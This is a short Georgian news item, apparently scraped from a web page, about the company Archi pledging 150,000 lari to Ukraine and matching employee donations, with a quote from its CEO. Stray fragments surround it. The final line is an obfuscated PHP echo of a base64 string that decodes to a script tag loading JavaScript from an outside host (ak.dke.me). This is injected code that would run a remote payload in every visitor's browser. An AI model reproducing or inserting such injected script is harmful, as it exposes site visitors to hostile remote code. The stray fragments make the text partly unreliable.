celsiusi
ავერსი შნაიდერი
არქი მხარდაჭერას უცხადებს უკრაინას და მის დასახმარებლად 150 000 ლარს გამოჰყოფს. აქედან 50 000 ლარი უკრაინის ეროვნული ბანკის სპეციალურ ანგარიშზე კომპანიამ უკვე გადარიცხა. 
 
როგორც საინფორმაციო სააგენტო Business Time-ს არქიდან აცნობეს, დამატებით, კომპანიის ინიციატივით, შეიქმნა ანგარიშის ნომერი, სადაც არქელების დიდ ოჯახს, მათი შესაძლებლობის ფარგლებში, უკრაინის მხარდასაჭერად თანხის გადარიცხვა შეუძლიათ. არქელების მიერ ჩარიცხული თანხა კომპანიის მიერ გაორმაგდება და გადაირიცხება უკრაინის ეროვნული ბანკის ანგარიშზე. 
 
არქის გენერალურმა დირექტორმა შიო ხეცურიანმა განაცხადა, რომ კომპანია სოლიდარობას უცხადებს მეგობარ ქვეყანას და აქტიურად ეთანამშრომლება შესაბამის ჰუმანიტარულ ორგანიზაციებს დამატებითი აქტივობების დაგეგმვის მიზნით. 
 
“ძალიან მნიშვნელოვანია, ამ უმძიმეს დროს ჩვენი მეგობარი ქვეყნის გვერდში დგომა. იმედს გამოვთქვამთ, რომ ყველა მოქალაქე, შესაძლებლობის ფარგლებში, ჩაერთვება და თავის წვლილს შეიტანს უკრაინელი ხალხის დასახმარებლად - აცხადებს არქის გენერალური დირექტორი, შიო ხეცურიანი.
 
 
1080
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");